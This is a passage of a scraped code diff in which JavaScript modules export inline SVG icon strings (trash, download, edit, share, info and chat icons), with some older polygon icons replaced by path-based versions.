<path id="Combined Shape" d="M9.33301 0.666016C10.398 0.666126 11.2683 1.49903 11.3291 2.54883L11.333 2.66602V3.33301H14.001C14.3689 3.33325 14.6668 3.63112 14.667 3.99902C14.667 4.34091 14.4097 4.62262 14.0781 4.66113L14.001 4.66602H13.333V13.333C13.3328 14.398 12.5 15.2683 11.4502 15.3291L11.333 15.333H4.66602C3.60101 15.3329 2.73077 14.5 2.66992 13.4502L2.66602 13.333V4.66602H2.00098C1.63279 4.66602 1.33398 4.36721 1.33398 3.99902C1.33414 3.65727 1.59139 3.37541 1.92285 3.33691L2.00098 3.33301H4.66602V2.66602C4.66602 1.60093 5.49901 0.729833 6.54883 0.668945L6.66602 0.666016H9.33301ZM3.99902 13.333C3.9992 13.6747 4.25748 13.9566 4.58887 13.9951L4.66602 13.999H11.333C11.6748 13.9989 11.9566 13.7416 11.9951 13.4102L11.999 13.333V4.66602H3.99902V13.333ZM6.66699 6.66602C7.00873 6.66618 7.2906 6.92343 7.3291 7.25488L7.33301 7.33301V11.333C7.33282 11.7009 7.03492 11.9988 6.66699 11.999C6.3251 11.999 6.04339 11.7417 6.00488 11.4102L6 11.333V7.33301C6 6.96482 6.2988 6.66602 6.66699 6.66602ZM9.33301 6.66602C9.6748 6.66612 9.95661 6.9234 9.99512 7.25488L9.99902 7.33301V11.333C9.99884 11.701 9.70099 11.9989 9.33301 11.999C8.99112 11.999 8.70941 11.7417 8.6709 11.4102L8.66602 11.333V7.33301C8.66602 6.96482 8.96482 6.66602 9.33301 6.66602ZM6.66602 1.99902C6.32435 1.99914 6.04257 2.25658 6.00391 2.58789L5.99902 2.66602V3.33301H9.99902V2.66602C9.99902 2.32413 9.74172 2.04242 9.41016 2.00391L9.33301 1.99902H6.66602Z" />
|
|
3
|
+
</svg>
|
|
4
|
+
`;
|
|
2
5
|
export {
|
|
3
|
-
|
|
6
|
+
C as default
|
|
4
7
|
};
|
|
@@ -1,12 +1,7 @@
|
|
|
1
|
-
const
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
<polygon class="st0" points="15.8,943.98 15.8,516.15 99.01,516.15 99.01,872.7 931.33,872.7 931.33,516.15 1014.54,516.15 \r
|
|
5
|
-
1014.54,943.98 "/>\r
|
|
6
|
-
<polygon class="st0" points="515.13,100.49 754.49,314.41 556.74,314.41 556.74,801.41 473.53,801.41 473.53,314.41 275.85,314.41 \r
|
|
7
|
-
"/>\r
|
|
8
|
-
</svg>\r
|
|
1
|
+
const C = `<svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
|
|
2
|
+
<path id="download" d="M8 8C8.34189 8 8.6236 8.25731 8.66211 8.58887L8.66699 8.66602V13.0566L10.1953 11.5283C10.4356 11.2881 10.8137 11.2695 11.0752 11.4727L11.1377 11.5283C11.378 11.7686 11.3967 12.1467 11.1934 12.4082L11.1377 12.4707L8.47168 15.1377C8.23143 15.3779 7.85332 15.3965 7.5918 15.1934L7.52832 15.1377L4.8623 12.4707C4.60202 12.2103 4.60198 11.7886 4.8623 11.5283C5.10263 11.2881 5.48072 11.2694 5.74219 11.4727L5.80469 11.5283L7.33301 13.0566V8.66602C7.33321 8.29802 7.63197 8.00004 8 8ZM1.27441 4.35938C2.33465 2.31465 4.53035 1.10941 6.82129 1.33887C8.86283 1.61112 10.5758 2.97711 11.2969 4.86621L11.3682 5.06543L11.666 5.06641C13.2326 5.06641 14.6556 6.17264 15.2002 7.76562L15.252 7.92676C15.4796 8.98929 15.2806 10.0218 14.709 11.002C14.5235 11.32 14.1149 11.4277 13.7969 11.2422C13.479 11.0566 13.3721 10.6481 13.5576 10.3301C13.9687 9.62523 14.1023 8.92779 13.9609 8.25781C13.6492 7.21903 12.7501 6.46222 11.7871 6.40332L11.666 6.39941H10.8662C10.5565 6.39934 10.2873 6.18634 10.2168 5.88477C9.81758 4.17382 8.39003 2.89331 6.66699 2.66309C4.94422 2.49081 3.26882 3.41089 2.46777 4.95508C1.7619 6.42573 1.89344 8.84352 2.75781 10.1689C2.95894 10.4773 2.87188 10.8907 2.56348 11.0918C2.25524 11.2925 1.84271 11.2054 1.6416 10.8975C0.519659 9.17715 0.359931 6.26382 1.27441 4.35938Z"/>
|
|
3
|
+
</svg>
|
|
9
4
|
`;
|
|
10
5
|
export {
|
|
11
|
-
|
|
6
|
+
C as default
|
|
12
7
|
};
|
|
@@ -1,4 +1,7 @@
|
|
|
1
|
-
const
|
|
1
|
+
const C = `<svg width="20" height="20" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
|
|
2
|
+
<path id="edit" d="M8.8252 2.88574C9.24242 2.88592 9.58105 3.22434 9.58105 3.6416C9.58082 4.02891 9.28873 4.34791 8.91309 4.3916L8.8252 4.39648H5.77832C4.57106 4.39666 3.58458 5.34123 3.51562 6.53125L3.51172 6.66406V14.2217C3.51189 15.4289 4.45549 16.4154 5.64551 16.4844L5.77832 16.4883H13.3359C14.5434 16.4883 15.5307 15.5446 15.5996 14.3545L15.6035 14.2217V10.5049C15.6035 10.0877 15.9412 9.74928 16.3584 9.74902C16.7459 9.74902 17.0656 10.0403 17.1094 10.416L17.1143 10.5049V14.2217C17.1141 16.2534 15.5107 17.9102 13.5 17.9961L13.3359 18H5.77832C3.74667 17.9998 2.08998 16.3962 2.00391 14.3857L2 14.2217V6.66406C2 4.63225 3.60363 2.97473 5.61426 2.88867L5.77832 2.88574H8.8252ZM13.2441 2.66406C14.1295 1.77878 15.5648 1.77893 16.4502 2.66406L17.3359 3.5498C18.221 4.43521 18.2212 5.87056 17.3359 6.75586L10.8477 13.2441C10.7059 13.3858 10.5128 13.4658 10.3125 13.4658H7.29004C6.87285 13.4656 6.53422 13.1272 6.53418 12.71V9.68652C6.5343 9.48634 6.61435 9.29395 6.75586 9.15234L13.2441 2.66406ZM15.3809 3.73242C15.0858 3.43788 14.6075 3.43773 14.3125 3.73242L8.04492 10V11.9541H9.99805L16.2666 5.68652C16.5388 5.41408 16.5595 4.98582 16.3291 4.68945L16.2666 4.61816L15.3809 3.73242Z"/>
|
|
3
|
+
</svg>
|
|
4
|
+
`;
|
|
2
5
|
export {
|
|
3
|
-
|
|
6
|
+
C as default
|
|
4
7
|
};
|
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
const C = `<svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
|
|
2
|
+
<g id="Frame 48097328">
|
|
3
|
+
<path id="Vector" d="M14.2513 9.12079C13.7826 9.12079 13.5007 9.40143 13.5007 9.86798V10.8011C13.5007 12.3884 13.4073 13.6004 10.5004 13.6004H4.49964C1.49928 13.6004 1.49928 12.2937 1.49928 10.6134V6.87921C1.31254 4.54648 2.43835 4.07993 3.7509 3.89224H3.84427C4.3129 3.89224 4.5948 3.61159 4.5948 3.14505C4.5948 2.6785 4.3129 2.39785 3.84427 2.39785H3.00036C1.40591 2.39964 0 3.70633 0 5.38662V12.013C0 13.6004 1.31254 15 3.00036 15H11.9081C13.5025 15 14.9084 13.6933 14.9084 12.013V9.77324C15.0018 9.49259 14.6265 9.12079 14.2513 9.12079ZM2.71846 9.49259C2.71846 10.2398 2.90519 10.9852 3.09373 11.6394C3.93763 9.21195 6.18745 7.43871 8.90591 7.43871V8.37181C8.90591 8.7454 9.09265 9.119 9.46792 9.3049C9.65466 9.39785 9.74982 9.49081 9.93656 9.49081C10.1233 9.49081 10.4052 9.39785 10.4986 9.3049L14.6247 6.13202C14.8115 5.94612 15 5.57252 15 5.19893C15 4.91828 14.8133 4.54469 14.6247 4.35878L10.5004 1.1859C10.3136 1 10.0317 1 9.84319 1C9.65466 1 9.56129 1 9.37455 1.1859C8.99928 1.37181 8.81254 1.7454 8.81254 2.119L8.81254 3.89224C6.5 3.89224 2.71846 6.87921 2.71846 9.49259Z"/>
|
|
4
|
+
</g>
|
|
5
|
+
</svg>
|
|
6
|
+
`;
|
|
7
|
+
export {
|
|
8
|
+
C as default
|
|
9
|
+
};
|
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
const C = `<svg width="20" height="20" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
|
|
2
|
+
<path id="Vector" d="M9.3458 3.34902C7.51111 3.34902 5.7714 4.10793 4.44124 5.48329C3.80018 6.15139 3.28703 6.93134 2.92725 7.78446C2.5572 8.6628 2.35807 9.58103 2.34105 10.5163C2.30314 12.3791 3.05055 14.1491 4.44124 15.5037C5.11267 16.1568 5.89948 16.6798 6.7617 17.046C7.6329 17.4232 8.56937 17.6269 9.51859 17.6455H9.64948C11.4614 17.6455 13.188 16.8981 14.5066 15.5417C15.1467 14.888 15.6612 14.1221 16.0244 13.2823C16.3963 12.4315 16.6049 11.5183 16.6392 10.5904V10.5487L16.6448 10.5108V10.4861L16.6411 10.4482V10.4103C16.5845 8.5381 15.8093 6.75953 14.4764 5.44352C13.1393 4.12845 11.3465 3.37966 9.47124 3.35301H9.34593V3.34902H9.3458ZM9.3458 2.00213L9.49584 2C14.1099 2.06451 17.8554 5.74676 17.9938 10.353C17.9977 10.3986 17.9977 10.4459 17.9977 10.4973C18.0033 10.5485 17.9977 10.5941 17.9918 10.6414C17.8326 15.09 14.2238 19 9.6532 19H9.49757C4.94417 18.9145 0.908597 15.1962 1.00158 10.5029C1.08511 5.99348 4.72403 2.00013 9.3458 2.00213ZM9.3764 14.7828C9.41045 14.8283 9.46179 14.8568 9.51859 14.8586C9.61438 14.8554 9.70503 14.8145 9.77079 14.7448C10.0022 14.5551 10.2756 14.2174 10.5923 13.7243L10.8579 13.876C10.0915 15.2078 9.27371 15.8775 8.41429 15.8775C8.08614 15.8775 7.82609 15.7844 7.63069 15.5985C7.53539 15.5082 7.46013 15.3989 7.40979 15.2776C7.35945 15.1564 7.33514 15.0259 7.33846 14.8947C7.33846 14.7069 7.38022 14.4699 7.46948 14.1777L8.52616 10.5464C8.62858 10.2012 8.67979 9.93934 8.67979 9.76298C8.67863 9.70469 8.66481 9.64735 8.63926 9.59494C8.61372 9.54253 8.57708 9.4963 8.53188 9.45947C8.42284 9.36793 8.28313 9.32116 8.14094 9.3286C8.06127 9.3286 7.96842 9.33432 7.86587 9.33618L7.95898 9.03267L10.5318 8.61532H10.9814L9.42375 14.0145C9.34394 14.3237 9.30217 14.5287 9.30217 14.6291C9.31002 14.6861 9.3345 14.7411 9.3764 14.7828ZM11.3058 7.02942C11.2022 7.13359 11.0788 7.2161 10.9429 7.27211C10.8071 7.32812 10.6614 7.35653 10.5145 7.35567C10.3692 7.35665 10.2253 7.32826 10.0913 7.27219C9.95736 7.21613 9.83611 7.13355 9.73487 7.02942C9.63046 6.92686 9.54788 6.80423 9.49213 6.66891C9.43637 6.53359 9.40859 6.38839 9.41045 6.24205C9.40782 6.0951 9.43486 5.94913 9.48994 5.81286C9.54502 5.67659 9.62701 5.55283 9.73102 5.44897C9.83191 5.34315 9.95361 5.25936 10.0885 5.20287C10.2233 5.14638 10.3684 5.11841 10.5146 5.12073C10.8296 5.12073 11.0972 5.23085 11.3115 5.44897C11.5259 5.66722 11.6359 5.93469 11.6359 6.24205C11.639 6.38908 11.6112 6.53511 11.5543 6.67073C11.4975 6.80634 11.4128 6.92854 11.3058 7.02942Z"/>
|
|
3
|
+
</svg>
|
|
4
|
+
`;
|
|
5
|
+
export {
|
|
6
|
+
C as default
|
|
7
|
+
};
|
|
@@ -0,0 +1,14 @@
|
|
|
1
|
+
const C = `<svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
|
|
2
|
+
<g id="Frame" clip-path="url(#clip0_94_116)">
|
|
3
|
+
<path id="Vector" d="M19.25 19.75H12.834L10.8075 22.0018C10.7416 22.075 10.6619 22.1345 10.5731 22.1769C10.4842 22.2193 10.3878 22.2438 10.2894 22.249C10.1911 22.2542 10.0926 22.2399 9.99979 22.2071C9.90693 22.1742 9.82146 22.1234 9.74825 22.0575C9.67504 21.9916 9.61552 21.9119 9.5731 21.8231C9.53067 21.7342 9.50617 21.6378 9.501 21.5394C9.49582 21.4411 9.51007 21.3426 9.54292 21.2498C9.57578 21.1569 9.62661 21.0715 9.6925 20.9983L11.9425 18.4983C12.0128 18.4201 12.0988 18.3576 12.1949 18.3149C12.2909 18.2721 12.3949 18.25 12.5 18.25H19.25C19.4142 18.25 19.5767 18.2177 19.7284 18.1549C19.88 18.092 20.0178 18 20.1339 17.8839C20.25 17.7678 20.342 17.63 20.4048 17.4784C20.4677 17.3267 20.5 17.1642 20.5 17V6.5C20.5 6.33585 20.4677 6.1733 20.4048 6.02165C20.342 5.86999 20.25 5.73219 20.1339 5.61612C20.0178 5.50004 19.88 5.40797 19.7284 5.34515C19.5767 5.28233 19.4142 5.25 19.25 5.25H4.75C4.58585 5.25 4.4233 5.28233 4.27165 5.34515C4.11999 5.40797 3.98219 5.50004 3.86612 5.61612C3.75004 5.73219 3.65797 5.86999 3.59515 6.02165C3.53233 6.1733 3.5 6.33585 3.5 6.5V17C3.5 17.1642 3.53233 17.3267 3.59515 17.4784C3.65797 17.63 3.75004 17.7678 3.86612 17.8839C3.98219 18 4.11999 18.092 4.27165 18.1549C4.4233 18.2177 4.58585 18.25 4.75 18.25H8C8.19891 18.25 8.38968 18.329 8.53033 18.4697C8.67098 18.6103 8.75 18.8011 8.75 19C8.75 19.1989 8.67098 19.3897 8.53033 19.5303C8.38968 19.671 8.19891 19.75 8 19.75H4.75C3.23125 19.75 2 18.5188 2 17V6.5C2 4.98125 3.23125 3.75 4.75 3.75H19.25C20.7687 3.75 22 4.98125 22 6.5V17C22 18.5188 20.7687 19.75 19.25 19.75ZM16.5 9C16.6989 9 16.8897 9.07902 17.0303 9.21967C17.171 9.36032 17.25 9.55109 17.25 9.75C17.25 9.94891 17.171 10.1397 17.0303 10.2803C16.8897 10.421 16.6989 10.5 16.5 10.5H7.5C7.30109 10.5 7.11032 10.421 6.96967 10.2803C6.82902 10.1397 6.75 9.94891 6.75 9.75C6.75 9.55109 6.82902 9.36032 6.96967 9.21967C7.11032 9.07902 7.30109 9 7.5 9H16.5ZM12 13C12.1989 13 12.3897 13.079 12.5303 13.2197C12.671 13.3603 12.75 13.5511 12.75 13.75C12.75 13.9489 12.671 14.1397 12.5303 14.2803C12.3897 14.421 12.1989 14.5 12 14.5H7.5C7.30109 14.5 7.11032 14.421 6.96967 14.2803C6.82902 14.1397 6.75 13.9489 6.75 13.75C6.75 13.5511 6.82902 13.3603 6.96967 13.2197C7.11032 13.079 7.30109 13 7.5 13H12Z" stroke="white" stroke-width="0.4"/>
|
|
4
|
+
</g>
|
|
5
|
+
<defs>
|
|
6
|
+
<clipPath id="clip0_94_116">
|
|
7
|
+
<rect width="24" height="24"/>
|
|
8
|
+
</clipPath>
|
|
9
|
+
</defs>
|
|
10
|
+
</svg>
|
|
11
|
+
`;
|
|
12
|
+
export {
|
|
13
|
+
C as default
|
|
14
|
+
};
|